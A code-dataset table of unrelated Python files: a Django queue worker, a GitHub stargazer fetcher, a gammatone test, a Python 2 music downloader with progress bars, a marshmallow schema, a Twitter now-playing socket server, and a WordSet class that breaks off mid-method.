content stringlengths 5 1.05M |
|---|
from datetime import datetime
import os
import platform
from setproctitle import setproctitle
import sys
import time
import traceback
from django.core.cache import cache
from django.core.management.base import BaseCommand, CommandError
from integlib.logbook_utils import configure_logging
from integlib.runtime import runtime
from queueapp.models import Queue, Issue, JiraPoller, AutoFilter, NopFilter, JenkinsActuator, Log
from queueapp.utils import Tee
FULL_RUN_INTERVAL = 120 # do a full run each 2 minutes
PROCNAME = 'this is the queueapp worker process'
TEEFILE = '/tmp/queueapp_worker'
def get_active_comp(comp_class, queue):
    """Return the active components of *comp_class* attached to *queue*.

    Rows whose ``is_active`` flag is explicitly False are filtered out;
    everything else (including NULL, if the field allows it) is kept.
    """
    attached = comp_class.objects.filter(queue=queue)
    return attached.exclude(is_active=False)
class Command(BaseCommand):
    """Django management command: the long-running queueapp worker loop."""

    help = 'Run the queueapp worker process'

    def __init__(self, *args, **kwargs):
        # Tag the process title and tee stdout/stderr into a per-pid file so
        # the worker's output is preserved when it runs unattended.
        self.pid = os.getpid()
        self.first_run = True
        setproctitle(f'{PROCNAME}:{self.pid}')
        # buffering=0 requires binary mode; the tee file is intentionally
        # kept open for the lifetime of the process.
        teefile = open(f'{TEEFILE}.{self.pid}', 'w+b', buffering=0)
        sys.stdout = Tee(sys.stdout, teefile)
        sys.stderr = Tee(sys.stderr, teefile)
        super().__init__(*args, **kwargs)

    def handle(self, *args, **options):
        """Run full_run() forever, pacing iterations to FULL_RUN_INTERVAL seconds."""
        # The worker relies on a case-sensitive filesystem; bail out early on
        # macOS unless TMPDIR points at a (presumably case-sensitive) volume.
        if platform.system() == 'Darwin' and ('TMPDIR' not in os.environ
                                              or not os.environ['TMPDIR'].startswith('/Volumes/')):
            self.stderr.write(
                'Macintosh traditionally defaults to a case-insensitive FS, bless its little soul.\n'
                'I am assuming that this is the case on this computer (CBA to test it properly).\n'
                'Set the TMPDIR environment variable pointing to a case-sensitive FS to continue.')
            return
        verbosity = int(options['verbosity'])
        configure_logging(verbose=verbosity > 1)
        while True:
            self.stdout.write('\n---')
            started = datetime.now()
            self.stdout.write(f'Started a full run on {started}')
            self.full_run(verbosity)
            self.first_run = False
            duration = datetime.now() - started
            self.stdout.write(f'The run took {duration}')
            duration_sec = duration.total_seconds()
            # Sleep away whatever is left of the interval; a run slower than
            # the interval starts the next iteration immediately.
            if duration_sec < FULL_RUN_INTERVAL:
                pause = FULL_RUN_INTERVAL - duration_sec
                self.stdout.write(f'Chilling for {pause} seconds')
                time.sleep(pause)

    def full_run(self, verbosity):
        """One pass over every active queue: poll, filter, actuate, trim logs."""
        # Drop cached state so each pass sees fresh data.
        cache.clear()
        queues = list(Queue.objects.exclude(is_active=False))
        self.stdout.write('The following queues are active:')
        for q in queues:
            self.stdout.write(f'- {q.name}')
            if self.first_run:
                q.log(f'Worker process started, pid={self.pid}')
        for q in queues:
            self.update_issues(q)
            # Only the first active actuator/poller per queue is used.
            actuator = get_active_comp(JenkinsActuator, q).first()
            if actuator:
                self.run_and_log_errors(actuator, method='check_running_issues')
                if verbosity > 1:
                    self.stdout.write(f'Done: JenkinsActuator.check_running_issues ({datetime.now()})')
            jpoller = get_active_comp(JiraPoller, q).first()
            if jpoller:
                self.run_and_log_errors(jpoller)
                if verbosity > 1:
                    self.stdout.write(f'Done: JiraPoller ({datetime.now()})')
            nopfilters = get_active_comp(NopFilter, q)
            for filter in nopfilters:
                self.run_and_log_errors(filter)
            autofilters = get_active_comp(AutoFilter, q)
            for filter in autofilters:
                self.run_and_log_errors(filter)
            if verbosity > 1:
                self.stdout.write(f'Done: AutoFilter ({datetime.now()})')
            actuator = get_active_comp(JenkinsActuator, q).first()
            if actuator:
                self.run_and_log_errors(actuator)
                if verbosity > 1:
                    self.stdout.write(f'Done: JenkinsActuator ({datetime.now()})')
            Log.truncate_logs(q)

    def run_and_log_errors(self, runnable, method='run'):
        """Invoke runnable.<method>(), logging (not propagating) any failure.

        KeyboardInterrupt is re-raised so the operator can stop the worker.
        """
        try:
            getattr(runnable, method)()
        except KeyboardInterrupt:
            self.stderr.write('Received ^C, quitting')
            raise
        except:
            # Deliberately broad: one misbehaving component must not kill
            # the whole worker loop.
            self.stderr.write(f'An error occurred in {runnable}')
            self.stderr.write(traceback.format_exc())

    def update_issues(self, q):
        """Refresh cached Jira data for every non-running buffered issue of *q*.

        Issues whose Jira status no longer matches their buffer's intended
        status are dropped from the queue (buffer set to None).
        """
        self.stdout.write('Updating issues in buffers...')
        issues = list(Issue.objects.filter(buffer__queue=q, is_running=False))
        issues_updated = 0
        for issue in issues:
            try:
                integ_issue = runtime.jira.get_issue(issue.key)
                issues_updated += 1
            except:
                pass  # Ignore Jira errors; stale data beats crashing the loop
            else:
                issue.update_props(integ_issue)
                if integ_issue.status != issue.buffer.intended_status:
                    intended_status = issue.buffer.intended_status
                    issue.buffer = None
                    q.log(f'Dropping the issue <a class=issue>{issue.key}</a> from the queue '
                          f'because its status has changed and is no longer <b>{intended_status}</b>')
                issue.save()
        self.stdout.write(f'Updated {issues_updated} out of {len(issues)} issue(s)')
|
import collections
import json
import logging
import traceback
from urllib.parse import urlparse, parse_qs
import github as gh
from tornado.httpclient import AsyncHTTPClient
import tornado.gen
def parse_link(link_header):
    """Split a GitHub ``Link`` header into (next_url, last_url).

    Assumes exactly two comma-separated entries, in the order
    ``<next>; rel="next", <last>; rel="last"``.
    """
    first, second = (part.strip() for part in link_header.split(','))
    # Drop the leading '<' and the trailing '>; rel="..."' suffix.
    next_url = first[1:-len('>; rel="next"')]
    last_url = second[1:-len('>; rel="last"')]
    return next_url, last_url
def handle_response(container, response):
    """Append the JSON-decoded list carried by *response* onto *container*.

    Responses flagged with an error are ignored silently, so a failed
    page simply contributes no items.
    """
    if response.error:
        return
    payload = response.body.decode('utf-8')
    container.extend(json.loads(payload))
@tornado.gen.coroutine
def repo_stargazers(repo, token):
    """Fetch the full stargazer list of *repo* from the GitHub REST API.

    The first page is fetched synchronously to learn the page count from
    the Link header; the remaining pages are fetched concurrently.
    Failed pages are retried, with a pause once several errors pile up.
    """
    count = repo.stargazers_count
    stargazers_url = repo.stargazers_url
    page_size = 100
    headers = {'User-Agent': 'tornado'}
    if token:
        headers['Authorization'] = 'token {}'.format(token)
    # The star+json media type includes starred_at timestamps.
    headers['Accept'] = 'application/vnd.github.v3.star+json'
    url = stargazers_url + "?per_page={}&page={}".format(page_size, 1)
    # Be good citizens and allow a maximum of 40 concurrent requests.
    client = AsyncHTTPClient(max_clients=40)
    response = yield client.fetch(url, headers=headers)
    stargazers = []
    handle_response(stargazers, response)
    # No Link header means everything fit on the first page.
    if 'Link' not in response.headers:
        return stargazers
    next_url, last_url = parse_link(response.headers['Link'])
    qs = parse_qs(urlparse(last_url).query)
    last_page = int(qs['page'][0])
    from functools import partial
    get_stargazers = partial(handle_response, stargazers)
    futures = []
    # Kick off every remaining page at once; results accumulate via the
    # fetch callback, the futures are awaited only for completion/errors.
    for page in range(2, last_page + 1):
        url = stargazers_url + "?per_page={}&page={}".format(page_size, page)
        f = client.fetch(url, headers=headers, callback=get_stargazers)
        f.url = url
        futures.append(f)
    error_count = 0
    while futures:
        waited = False
        # NOTE(review): the loop variable is immediately shadowed by
        # pop(0); the list is drained front-to-back while retries are
        # re-appended at the back.
        for future in futures[:]:
            future = futures.pop(0)
            try:
                yield future
            except tornado.httpclient.HTTPError as err:
                # Try again, but give it a little while...
                url = future.url
                # NOTE(review): error_count is only incremented on the
                # skip branch below, so this condition appears to stay
                # True forever and a permanently failing page would be
                # retried indefinitely — confirm intended behaviour.
                if error_count < 5:
                    f = client.fetch(future.url, headers=headers,
                                     callback=get_stargazers)
                    f.url = future.url
                    futures.append(f)
                else:
                    if not waited:
                        # Give Github some time to get over our request
                        # before we retry.
                        logging.exception("Sleeping attempt {} to rectify "
                                          "fetch error.".format(error_count))
                        yield tornado.gen.sleep(15)
                    error_count += 1
                    waited = True
                    logging.exception('A problem with {} occured after {} '
                                      'attempts. Skipping'
                                      ''.format(url, error_count))
                    logging.exception(traceback.format_exc())
    # Sanity check: GitHub's reported count should match what we collected.
    if len(stargazers) != count:
        logging.warning('The number of expected stargazers ({}) did not '
                        'match the number we recieved ({}).'
                        ''.format(count, len(stargazers)))
    return stargazers
if __name__ == '__main__':
    # NOTE(review): the placeholder token is immediately overwritten with
    # None, so all requests run unauthenticated (low GitHub rate limit).
    token = '...'
    token = None
    g = gh.Github(token)
    r = g.get_repo('d3/d3')
    # r = g.get_repo('dask/dask')
    # NOTE(review): this reassignment discards the d3/d3 repo above; only
    # scitools/iris is actually queried.
    r = g.get_repo('scitools/iris')
    from tornado.ioloop import IOLoop
    from functools import partial
    stargazers_fn = partial(repo_stargazers, r, token)
    stargazers = IOLoop.instance().run_sync(stargazers_fn)
    # NOTE(review): run_sync is executed twice, re-fetching everything —
    # presumably a benchmarking/debugging leftover.
    stargazers = IOLoop.instance().run_sync(stargazers_fn)
    print(len(stargazers))
    print(stargazers[50])
|
#!/usr/bin/env python3
# Copyright 2014 Jason Heeris, jason.heeris@gmail.com
#
# This file is part of the gammatone toolkit, and is licensed under the 3-clause
# BSD license: https://github.com/detly/gammatone/blob/master/COPYING
import nose
import numpy as np
import scipy.io
from pkg_resources import resource_stream
import gammatone.filters
REF_DATA_FILENAME = 'data/test_erbspace_data.mat'
INPUT_KEY = 'erbspace_inputs'
RESULT_KEY = 'erbspace_results'
INPUT_COLS = ('f_low', 'f_high', 'num_f')
RESULT_COLS = ('cfs',)
def load_reference_data():
    """ Load test data generated from the reference code

    Yields (input_dict, ref_dict) pairs, one per row of the .mat file,
    with columns mapped onto the INPUT_COLS / RESULT_COLS names.
    """
    # Load test data
    with resource_stream(__name__, REF_DATA_FILENAME) as test_data:
        data = scipy.io.loadmat(test_data, squeeze_me=False)
    zipped_data = zip(data[INPUT_KEY], data[RESULT_KEY])
    for inputs, refs in zipped_data:
        # Squeeze away MATLAB's singleton dimensions before naming columns.
        input_dict = dict(zip(INPUT_COLS, map(np.squeeze, inputs)))
        ref_dict = dict(zip(RESULT_COLS, map(np.squeeze, refs)))
        yield (input_dict, ref_dict)
def test_ERB_space_known_values():
    """Nose test generator: yields one ERBSpaceTester per reference row."""
    for inputs, refs in load_reference_data():
        args = (
            inputs['f_low'],
            inputs['f_high'],
            inputs['num_f'],
        )
        expected = (refs['cfs'],)
        yield ERBSpaceTester(args, expected)
class ERBSpaceTester:
    """Callable test case comparing erb_space() output to reference data.

    The ``description`` attribute is what nose prints when the generated
    test runs.
    """

    def __init__(self, args, expected):
        self.args = args
        self.expected = expected[0]
        self.description = "ERB space for {:.1f} {:.1f} {:d}".format(
            float(self.args[0]),
            float(self.args[1]),
            int(self.args[2]),
        )

    def __call__(self):
        computed = gammatone.filters.erb_space(*self.args)
        assert np.allclose(computed, self.expected, rtol=1e-6, atol=1e-10)
if __name__ == '__main__':
    # Allow running this test module directly through the nose runner.
    nose.main()
|
from django.conf.urls import url, include
from django.contrib import admin
from . import views
# Route the app root to the shift list view.
urlpatterns = [
    url(r'^$', views.shift_list, name='shift_list'),
]
|
# -*- coding:utf-8 -*-
from os import path
import os
import datetime
import sys
import requests
import config, log, util
import time
import hist_handler
import traceback
from threadpool import ThreadPool
from Queue import Queue
from mutagen.id3 import ID3,TRCK,TIT2,TALB,TPE1,APIC,TDRC,COMM,TPOS,USLT
from threading import Thread
#see download_url_urllib doc
import urllib2
import pydoc
import codecs
LOG = log.get_logger('zxLogger')
if config.LANG.upper() == 'CN':
import i18n.msg_cn as msg
else:
import i18n.msg_en as msg
#total number of jobs
total=0
#the number of finished jobs
done=0
#progress dictionary, for progress display. {filename:Download_Progress obj}
progress = {}
#finsished job to be shown in progress
done2show=[]
#success/failed song lists (song objects)
success_list=[]
failed_list=[]
class Download_Progress(object):
    """
    a download progress object

    Tracks how many bytes have arrived versus the total expected, plus
    the start time, so the UI can render a percentage and transfer rate.
    """
    def __init__(self, filename):
        self.filename = filename
        self.total_length = 0
        self.finished_length = 0
        self.start = datetime.datetime.now()

    def percent(self):
        """calculate downloaded percentage (0.0 when total is unknown)"""
        if not self.total_length:
            return 0.0
        return float(self.finished_length) / float(self.total_length)

    def rate(self):
        """ calculate downloading rate in KiB/s

        Bug fix: the original divided the *remaining* bytes
        (total - finished) by the elapsed time, which is not a transfer
        rate even though the UI labels it 'kib/s'; use the bytes actually
        downloaded. A zero elapsed time yields 0.0 instead of raising
        ZeroDivisionError.
        """
        elapsed = (datetime.datetime.now() - self.start).total_seconds()
        if elapsed <= 0:
            return 0.0
        return float(self.finished_length) / elapsed / 1024
class Downloader(Thread):
    """Feeder thread: queues every song on the shared thread pool, then
    blocks until the pool has drained all tasks."""

    def __init__(self, songs, pool):
        Thread.__init__(self)
        self.songs = songs
        self.pool = pool

    def run(self):
        global progress
        for track in self.songs:
            self.pool.add_task(download_single_song, track)
        self.pool.wait_completion()
def get_proxy(song):
    """Build the proxy mapping for *song*'s handler, or None when direct.

    A handler-level proxy pool takes precedence over a single configured
    proxy.
    """
    handler = song.handler
    if handler.need_proxy_pool:
        return {'http': handler.proxy_pool.get_proxy()}
    if handler.proxy:
        return {'http': handler.proxy}
    return None
def write_mp3_meta(song):
    """
    write mp3 meta data to downloaded mp3 files
    @song an Song instance
    """
    # Build a fresh ID3 tag with title, album, artist and track number
    # (encoding=3 selects UTF-8 text frames) and write it into the file.
    id3 = ID3()
    id3.add(TIT2(encoding=3, text=song.song_name))
    id3.add(TALB(encoding=3, text=song.album_name))
    id3.add(TPE1(encoding=3, text=song.artist_name))
    id3.add(TRCK(encoding=3, text=str(song.track_no)))
    id3.save(song.abs_path)
def print_progress():
    """ print progress info

    Redraws the whole console: header, one bar per in-flight download, a
    global progress bar, recently finished files and failures. Reads the
    module-level progress/done/total/done2show/failed_list state.
    """
    #the factor of width used for progress bar
    percent_bar_factor = 0.4
    width = util.get_terminal_size()[1] -5
    # NOTE(review): '2/10' is integer division of constants (== 0), so this
    # subtracts nothing — '(int(...)-2)/10' may have been intended; confirm.
    bar_count = (int(width*percent_bar_factor)-2/10) # number of percent bar
    #line = log.hl(u' %s\n'% ('-'*90), 'cyan')
    line = log.hl(u' %s\n'% ('+'*width), 'cyan')
    sep = log.hl(u' %s\n'% ('='*width), 'cyan')
    sys.stdout.write(u'\x1b[2J\x1b[H') #clear screen
    sys.stdout.write(line)
    header = msg.fmt_dl_header % (config.DOWNLOAD_DIR, config.THREAD_POOL_SIZE)
    #header = util.ljust(header, width)
    sys.stdout.write(log.hl(u' %s'%header,'warning'))
    sys.stdout.write(line)
    fmt_progress = '%s [%s] %.1f%% (%dkib/s)\n'
    all_p = [] #all progress bars, filled by following for loop
    sum_percent = 0 # total percent for running job
    sum_rate = 0 # total rate for running job
    total_percent = 0
    for filename, prog_obj in progress.items():
        percent = prog_obj.percent()
        rate = prog_obj.rate()
        #sum for the total progress
        sum_percent += percent
        sum_rate += rate
        bar = util.ljust('=' * int(percent * bar_count), bar_count)
        per100 = percent * 100
        single_p = fmt_progress % \
            (util.rjust(filename,(width - bar_count -22)), bar, per100,rate) # the -20 is for the xx.x% and [ and ] xx.xkb/s (spaces)
        all_p.append(log.hl(single_p,'green'))
    #calculate total progress percent
    total_percent = float(sum_percent+done)/total
    #global progress
    g_text = msg.fmt_dl_progress % (done, total)
    g_bar = util.ljust('#' * int(total_percent* bar_count), bar_count)
    g_progress = fmt_progress % \
        (util.rjust(g_text,(width - bar_count -22)), g_bar, 100*total_percent,sum_rate) # the -20 is for the xx.x% and [ and ] xx.xkb/s (spaces)
    #output all total progress bars
    sys.stdout.write(log.hl(u'%s'%g_progress, 'red'))
    sys.stdout.write(sep)
    #output all downloads' progress bars
    sys.stdout.write(''.join(all_p))
    # finished jobs
    if len(done2show):
        sys.stdout.write(line)
        sys.stdout.write(log.hl(msg.fmt_dl_last_finished % config.SHOW_DONE_NUMBER,'warning'))
        sys.stdout.write(line)
        #display finished jobs
        for d in done2show:
            sys.stdout.write(log.hl(u' √ %s\n'% d,'cyan'))
    #failed downloads
    if len(failed_list):
        sys.stdout.write(line)
        sys.stdout.write(log.hl(msg.fmt_dl_failed_jobs,'error'))
        sys.stdout.write(line)
        #display failed jobs
        for failed_song in failed_list:
            sys.stdout.write(log.hl(u' ✘ %s\n' % failed_song.filename,'red'))
    sys.stdout.write(line)
    sys.stdout.flush()
def fill_download_progress(filename, total_length, finished_length):
    """ fill the global dict progress {} with download progress

    An existing entry gets its byte counters refreshed; an unknown file
    gets a fresh Download_Progress record (counters start at zero).
    """
    global progress
    try:
        prog_obj = progress[filename]
    except KeyError:
        progress[filename] = Download_Progress(filename)
    else:
        prog_obj.total_length = total_length
        prog_obj.finished_length = finished_length
def download_url_urllib(url,filepath,show_progress=False, proxy=None):
    """
    this function does the samething as the download_url(). The different is
    this function uses the standard urllib2 to download files.
    basic downloading function, download url and save to
    file path
    http.get timeout: 30s
    Returns 0 on success, 1 on any failure.
    """
    if ( not filepath ) or (not url):
        LOG.error( 'Url or filepath is not valid, resouce cannot be downloaded.')
        return 1
    fname = path.basename(filepath)
    try:
        # Install a proxy-aware opener only when a proxy was supplied.
        proxyServer = urllib2.ProxyHandler(proxy) if proxy else None
        opener = urllib2.build_opener()
        if proxyServer:
            opener = urllib2.build_opener(proxyServer)
        urllib2.install_opener(opener)
        r = urllib2.urlopen(url, timeout=30)
        if r.getcode() == 200:
            total_length = int(r.info().getheader('Content-Length').strip())
            done_length = 0
            chunk_size=1024
            # Stream to disk in 1 KiB chunks, reporting progress per chunk.
            with open(filepath,'wb') as f:
                while True:
                    chunk = r.read(chunk_size)
                    done_length += len(chunk)
                    if not chunk:
                        break
                    f.write(chunk)
                    if show_progress:
                        fill_download_progress(fname, total_length, done_length)
            return 0
        else:
            # NOTE(review): urllib2 responses have no 'status_code'
            # attribute (that belongs to requests); this log line would
            # raise AttributeError — should be r.getcode().
            LOG.debug("[DL_URL] HTTP Status %d . Song: %s " % (r.status_code,fname))
            return 1
    except Exception, err:
        # Any network error (including timeout) is logged and reported as 1.
        LOG.debug("[DL_URL] downloading song %s timeout!" % fname)
        LOG.debug(traceback.format_exc())
        return 1
def download_url(url,filepath,show_progress=False, proxy=None):
    """
    basic downloading function, download url and save to
    file path
    http.get timeout: 30s
    Returns 0 on success, 1 on any failure.
    """
    if ( not filepath ) or (not url):
        LOG.error( 'Url or filepath is not valid, resouce cannot be downloaded.')
        return 1
    fname = path.basename(filepath)
    try:
        #get request timeout 30 s
        r = requests.get(url, stream=True, timeout=30, proxies=proxy)
        if r.status_code == 200:
            total_length = int(r.headers.get('content-length'))
            done_length = 0
            # Stream to disk in 1 KiB chunks, reporting progress per chunk.
            with open(filepath,'wb') as f:
                for chunk in r.iter_content(1024):
                    done_length += len(chunk)
                    f.write(chunk)
                    if show_progress:
                        fill_download_progress(fname, total_length, done_length)
            return 0
        else:
            LOG.debug("[DL_URL] HTTP Status %d . Song: %s " % (r.status_code,fname))
            return 1
    except Exception, err:
        # Timeouts and connection errors end up here.
        LOG.debug("[DL_URL] downloading song %s timeout!" % fname)
        LOG.debug(traceback.format_exc())
        return 1
def download_single_song(song):
    """
    download a single song
    max retry 5 times

    Runs inside a pool worker thread. Updates the module-level 'progress'
    and 'done' bookkeeping and routes the song into the success or failed
    lists when finished.
    """
    global done, progress
    #download retry count
    retry = 5
    if ( not song.filename ) or (not song.dl_link):
        LOG.error( 'Song [id:%s] cannot be downloaded. Filename or dl_link is missing.' % song.song_id)
        fill_failed_list(song)
        done+=1
        return
    mp3_file = song.abs_path
    dl_result = -1 # download return code
    LOG.debug("[DL_Song] downloading: %s " % song.dl_link)
    while retry > 0 :
        retry -= 1
        LOG.debug("[DL_Song] start downloading: %s retry: %d" % (mp3_file, 5-retry))
        #if file not in progress, add
        if song.filename not in progress:
            fill_download_progress(song.filename, 0.0, 0.0)
        #do the actual downloading
        dl_result = download_url_urllib(song.dl_link, mp3_file, show_progress=True, proxy= get_proxy(song))
        if dl_result == 0: #success
            write_mp3_meta(song)
            LOG.debug("[DL_Song] Finished: %s" % mp3_file)
            break
        else: # return code is not 0
            #remove from progress
            del progress[song.filename]
            if path.exists(song.abs_path):
                #remove file if already exists
                LOG.debug( '[DL_Song] remove incompleted file : ' + song.abs_path)
                os.remove(song.abs_path)
            # retry
    done+=1 #no matter success of fail, the task was done
    if dl_result == 0:
        #set the success flag
        song.success = True
        fill_done2show(song)
        #remove from progress
        del progress[song.filename]
    else:
        # if it comes here, 5 retries run out
        fill_failed_list(song)
def fill_done2show(song):
    """
    fill the given filename into global list 'done2show'
    Depends on the config.SHOW_DONE_NUMBER, the eldest entry will be
    poped out from the list.
    Also records the song object itself in the global success_list.
    """
    global done2show, success_list
    success_list.append(song)
    # Newest entries sit at the head; once the display list is full the
    # oldest (tail) entry is evicted.
    if len(done2show) == config.SHOW_DONE_NUMBER:
        done2show.pop()
    done2show.insert(0, song.filename)
def fill_failed_list(song):
    """
    fill the given song into global list 'failed2show'
    Newest failures are inserted at the head of the list.
    """
    global failed_list
    failed_list.insert(0,song)
def start_download(songs, skipped_hists):
    """
    start multi-threading downloading songs. and generate a summary file
    songs: the list of songs need to be downloaded
    call the finish_hook function, pass skipped_hist
    """
    global total
    total = len(songs)
    LOG.debug('init thread pool (%d) for downloading'% config.THREAD_POOL_SIZE)
    pool = ThreadPool(config.THREAD_POOL_SIZE)
    downloader = Downloader(songs, pool)
    LOG.debug('Start downloading' )
    downloader.start()
    # Poll once a second, redrawing the console until the worker threads
    # have bumped the global 'done' counter up to 'total'.
    while done < total:
        time.sleep(1)
        print_progress()
    # handling lyrics downloading
    download_lyrics(songs)
    print log.hl(msg.fmt_insert_hist, 'warning')
    hist_handler.insert_hist(songs)
    print log.hl(msg.fmt_all_finished, 'warning')
    #call finish hook
    finish_summary(skipped_hists)
def finish_summary(skipped_hist):
    """
    build the summary after finishing all dl
    skipped_hist: a History list, contains skipped songs, it is not empty only
    if incremental_dl is true
    Prompts the user to [v]iew the summary in a pager, [s]ave it to a file
    in the download dir, or [q]uit.
    """
    border= "\n"+u">>"*40 + u"\n"
    #build summary text:
    text = []
    if skipped_hist:
        text.append( border+msg.fmt_summary_skip_title +border)
        text.append( msg.fmt_summary_skip_header)
        for hist in skipped_hist:
            text.append( "%s\t%s\t%s\t%s" % (msg.head_xm if hist.source ==1 else msg.head_163, hist.last_dl_time_str(), hist.song_name, hist.location))
    if success_list:
        text.append( border+msg.fmt_summary_success_title +border)
        text.append( msg.fmt_summary_success_header)
        for song in success_list:
            text.append('%s\t%s'%(song.song_name, song.abs_path))
    if failed_list:
        text.append( border+msg.fmt_summary_failed_title +border)
        text.append( msg.fmt_summary_failed_header)
        for song in failed_list:
            text.append('%s\t%s'%(song.song_name, song.abs_path))
    # Simple interactive menu; loops until a recognised choice is made.
    while True:
        sys.stdout.write(msg.summary_prompt)
        choice = raw_input().lower()
        if choice == 'q' or choice == '':
            break
        elif choice == 'v':
            pydoc.pager(u"\n".join(text))
            break
        elif choice == 's':
            summary = path.join(config.DOWNLOAD_DIR,'summary_'+str(datetime.datetime.today())+".txt")
            with codecs.open(summary, 'w', 'utf-8') as f:
                f.write("\n".join(text))
            print log.hl(msg.summary_saved % summary ,'cyan')
            break
        else:
            sys.stdout.write(msg.summary_prompt_err)
def download_lyrics(songs):
    """download / write lyric to file if it is needed

    Xiami songs expose a direct lyric URL; Netease (163) lyrics are
    fetched through their JSON API and written out as UTF-8 text.
    """
    url_lyric_163 = "http://music.163.com/api/song/lyric?id=%s&lv=1"
    percent_bar_factor = 0.4
    width = util.get_terminal_size()[1] -5
    bar_count = (int(width*percent_bar_factor)-2/10) # number of percent bar
    line = log.hl(u' %s'% ('+'*width), 'cyan')
    # All songs come from one handler, so checking the first is enough.
    if songs[0].handler.dl_lyric == True:
        print log.hl(msg.fmt_dl_lyric_start, 'warning')
        print line
        for song in songs:
            if song.lyric_abs_path:
                print log.hl(u' %s '% song.lyric_filename,'cyan'), #the ending comma is for hide the newline
                if song.song_type == 1: #xiami
                    if song.handler.need_proxy_pool:
                        if song.lyric_link:
                            download_url(song.lyric_link, song.lyric_abs_path, show_progress=True, proxy=get_proxy(song))
                    else:
                        if song.lyric_link:
                            download_url(song.lyric_link, song.lyric_abs_path, show_progress=True)
                    print log.hl(u' √','cyan')
                else: #163
                    lyric_link = url_lyric_163 % song.song_id
                    lyric_json = song.handler.read_link(lyric_link).json()
                    if not lyric_json or not lyric_json.has_key('lrc') or not lyric_json['lrc'].has_key('lyric'):
                        print log.hl(u' ✘ Not Found','red')
                        continue
                    # NOTE(review): this re-fetches the same URL a second
                    # time; the already-parsed lyric_json could be reused.
                    song.lyric_text = song.handler.read_link(lyric_link).json()['lrc']['lyric']
                    import codecs
                    with codecs.open(song.lyric_abs_path, 'w', 'utf-8') as f:
                        f.write(song.lyric_text)
                    print log.hl(u' √','cyan')
        print line
|
from marshmallow_sqlalchemy import SQLAlchemyAutoSchema
from flask_marshmallow.fields import AbsoluteUrlFor
from driftbase.models.db import FriendInvite
from marshmallow import pre_dump, fields, post_dump
class InviteSchema(SQLAlchemyAutoSchema):
    """Serialises a FriendInvite row plus both players' names and URLs."""

    class Meta:
        model = FriendInvite
        load_instance = True
        include_fk = True
        ordered = True
        # The soft-delete flag is internal; never expose it.
        exclude = ("deleted", )

    issued_by_player_url = AbsoluteUrlFor("players.entry", player_id='<issued_by_player_id>')
    issued_by_player_name = fields.String()
    issued_to_player_url = AbsoluteUrlFor("players.entry", player_id='<issued_to_player_id>')
    issued_to_player_name = fields.String()

    @pre_dump
    def _populate_names(self, obj, many, **kwargs):
        # Dump input is a (invite, to_name, by_name) tuple (e.g. a joined
        # query row); stash the names on the model instance so the name
        # fields declared above can pick them up.
        obj, issued_to_player_name, issued_by_player_name = obj
        obj.issued_to_player_name = issued_to_player_name
        obj.issued_by_player_name = issued_by_player_name
        return obj
class FriendRequestSchema(InviteSchema):
    """Invite schema plus the URL the recipient uses to accept the request."""
    accept_url = AbsoluteUrlFor("friendships.list", player_id='<issued_to_player_id>')
|
# -*- encoding:utf-8 -*-
from datetime import datetime
import socket
import re
from twython import Twython
import os
import json
home = os.path.expanduser("~")
twitter_conf_file = os.path.join(home, '.ashioto', 'twitter.json')
tc = json.load(open(twitter_conf_file))
CONSUMER_KEY = tc["CONSUMER_KEY"]
CONSUMER_SECRET = tc["CONSUMER_SECRET"]
ACCESS_TOKEN = tc["ACCESS_TOKEN"]
ACCESS_TOKEN_SECRET = tc["ACCESS_TOKEN_SECRET"]
class NameServer(object):
    """Tiny TCP server that accepts one streaming (vorbis) source, scrapes
    ARTIST/TITLE tags out of the raw stream and tweets now-playing updates."""

    def __init__(self, host="localhost", port=8000, buffer_size=8192, timeout=1):
        self.host = host
        self.port = port
        self.buffer_size = buffer_size
        self.timeout = timeout
        self.conn = None          # accepted client socket, set in run()
        self.connected = False    # True once the HTTP 200 has been sent
        self.twitter = Twython(app_key=CONSUMER_KEY,
                               app_secret=CONSUMER_SECRET,
                               oauth_token=ACCESS_TOKEN,
                               oauth_token_secret=ACCESS_TOKEN_SECRET)

    def response_ok(self):
        # Minimal HTTP handshake so the source client starts streaming.
        self.conn.send('HTTP/1.0 200 OK\r\n\r\n')

    def tweet(self, name, title):
        """Post a now-playing status for (name, title)."""
        songinfo = '♪ "{}" ({})'.format(title, name)
        print songinfo
        self.twitter.update_status(status=songinfo)

    def run(self):
        """Accept a single connection and pump it until the peer disconnects."""
        cue = SongCue(callback=self.tweet)
        # Tags appear inline in the stream as 'ARTIST=...TITLE=...vorbis'.
        artist_title_re = re.compile("ARTIST=(.*)TITLE=(.*)vorbis")
        print "NameServer start at {}:{}".format(self.host, self.port)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((self.host, self.port))
        s.listen(1)
        conn, addr = s.accept()
        print 'Connected by', addr
        self.conn = conn
        while 1:
            data = conn.recv(8192)
            if not data: break
            if not self.connected:
                self.response_ok()
                self.connected = True
            at = artist_title_re.search(data)
            if at:
                name = at.group(1)
                title = at.group(2)
                cue.add(name, title)
            # Give the cue a chance to flush a pending, debounced tweet.
            cue.noop()
        self.conn.close()
        print "NameServer stop"
class SongCue(object):
    """Debounce for now-playing updates.

    Remembers the most recent (name, title) pair and fires the callback
    once the pending entry has been sitting for longer than *bytime*
    seconds (checked from noop()).
    """

    def __init__(self, bytime=60, callback=None):
        self.bytime = bytime
        self.callback = callback
        self.new = {}

    def add(self, name, title):
        # Replace any pending entry and restart its clock.
        self.new["title"] = title
        self.new["name"] = name
        self.new["time"] = datetime.now()

    def noop(self):
        # Periodic tick: fire once the pending entry is old enough.
        if "time" not in self.new:
            return
        age = datetime.now() - self.new["time"]
        if age.seconds > self.bytime:
            self.fire()

    def fire(self):
        self.callback(self.new["name"], self.new["title"])
        self.new = {}
if __name__ == '__main__':
    # Run the server with default host/port until the source disconnects.
    NameServer().run()
|
from utils import lowercase, key_of_max
import string
#
# WordSet class
#
class WordSet:
    """
    Set of unique words, all in lower case and of positive length.
    """
    def __init__(self, text):
        """
        Form a WordSet from a string of words or collection of words.
        """
        self.text = text
        # Parse once at construction time. The original recomputed and
        # *appended* into self.word_set on every words() call, so calling
        # words() twice returned duplicated entries.
        tokens = str(text).lower().split()
        cleaned = (''.join(c for c in tok if c not in string.punctuation)
                   for tok in tokens)
        self.word_set = sorted({w for w in cleaned if w})

    def words(self):
        """
        Return sorted list of words in WordSet.
        >>> WordSet("Hi. Hey you. How, the heck, are you?").words()
        ['are', 'heck', 'hey', 'hi', 'how', 'the', 'you']
        """
        # Return a copy so callers cannot mutate our internal list.
        return list(self.word_set)

    def __contains__(self, word):
        # Membership is tested against the parsed word set. The original
